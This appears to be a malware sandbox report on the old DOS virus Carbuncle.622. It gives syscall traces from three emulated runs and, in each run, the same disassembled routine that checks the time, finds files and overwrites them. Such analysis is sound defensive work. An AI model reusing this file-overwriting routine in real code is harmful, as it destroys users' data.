Sample viewer

vx.netlux.org/Virus.DOS.Carbuncle.622

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:05.719761886Z 44 PC: 12a59 | Get time
0x12a59: cmp dh, 0x10
0x12a5c: jg 0x12a8d
0x12a5e: mov al, 5
0x12a60: mov byte ptr [0x25b], al
0x12a63: mov ah, 0x4e
0x12a65: mov dx, 0x25c
0x12a68: int 0x21
0x12a6a: jb 0x12a8d
0x12a6c: mov ax, 0x3d01
0x12a6f: mov dx, 0x9e
0x12a72: int 0x21
0x12a74: mov bh, 0x40
0x12a76: mov dx, 0x100
0x12a79: xchg ax, bx
0x12a7a: mov cl, 0x2a
0x12a7c: int 0x21
0x12a7e: mov ah, 0x3e
0x12a80: int 0x21
0x12a82: dec byte ptr [0x25b]
0x12a86: je 0x12a51
2018-12-17T23:10:05.722507246Z 60 PC: 12a97 | Create or truncate file
2018-12-17T23:10:06.639657967Z 64 PC: 12aa3 | Write file or device (Write 622 bytes on handle 5)
2018-12-17T23:10:06.809950346Z 62 PC: 12aa7 | Close file
2018-12-17T23:10:06.818279879Z 67 PC: 12ab2 | Get or set file attributes
2018-12-17T23:10:06.82960899Z 26 PC: 12ab9 | Set disk transfer address
2018-12-17T23:10:06.830692835Z 78 PC: 12ac0 | Find first file
2018-12-17T23:10:06.83979429Z 76 PC: 12a55 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16752,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:45.443651912Z 44 PC: 12a59 | Get time
0x12a59: cmp dh, 0x10
0x12a5c: jg 0x12a8d
0x12a5e: mov al, 5
0x12a60: mov byte ptr [0x25b], al
0x12a63: mov ah, 0x4e
0x12a65: mov dx, 0x25c
0x12a68: int 0x21
0x12a6a: jb 0x12a8d
0x12a6c: mov ax, 0x3d01
0x12a6f: mov dx, 0x9e
0x12a72: int 0x21
0x12a74: mov bh, 0x40
0x12a76: mov dx, 0x100
0x12a79: xchg ax, bx
0x12a7a: mov cl, 0x2a
0x12a7c: int 0x21
0x12a7e: mov ah, 0x3e
0x12a80: int 0x21
0x12a82: dec byte ptr [0x25b]
0x12a86: je 0x12a51
2018-12-25T12:53:45.446104114Z 78 PC: 12a6a | Find first file
2018-12-25T12:53:45.451789687Z 60 PC: 12a97 | Create or truncate file
2018-12-25T12:53:45.467651134Z 64 PC: 12aa3 | Write file or device (Write 622 bytes on handle 5)
2018-12-25T12:53:45.476287872Z 62 PC: 12aa7 | Close file
2018-12-25T12:53:45.484786679Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T12:53:45.494368795Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T12:53:45.495939304Z 78 PC: 12ac0 | Find first file
2018-12-25T12:53:45.505651245Z 76 PC: 12a55 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":16752,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:46.257307234Z 44 PC: 12a59 | Get time
0x12a59: cmp dh, 0x10
0x12a5c: jg 0x12a8d
0x12a5e: mov al, 5
0x12a60: mov byte ptr [0x25b], al
0x12a63: mov ah, 0x4e
0x12a65: mov dx, 0x25c
0x12a68: int 0x21
0x12a6a: jb 0x12a8d
0x12a6c: mov ax, 0x3d01
0x12a6f: mov dx, 0x9e
0x12a72: int 0x21
0x12a74: mov bh, 0x40
0x12a76: mov dx, 0x100
0x12a79: xchg ax, bx
0x12a7a: mov cl, 0x2a
0x12a7c: int 0x21
0x12a7e: mov ah, 0x3e
0x12a80: int 0x21
0x12a82: dec byte ptr [0x25b]
0x12a86: je 0x12a51
2018-12-25T12:53:46.259782636Z 60 PC: 12a97 | Create or truncate file
2018-12-25T12:53:46.276186322Z 64 PC: 12aa3 | Write file or device (Write 622 bytes on handle 5)
2018-12-25T12:53:46.284122619Z 62 PC: 12aa7 | Close file
2018-12-25T12:53:46.292355925Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T12:53:46.302870123Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T12:53:46.30377064Z 78 PC: 12ac0 | Find first file
2018-12-25T12:53:46.313180934Z 76 PC: 12a55 | Terminate with return code (Return code = '18')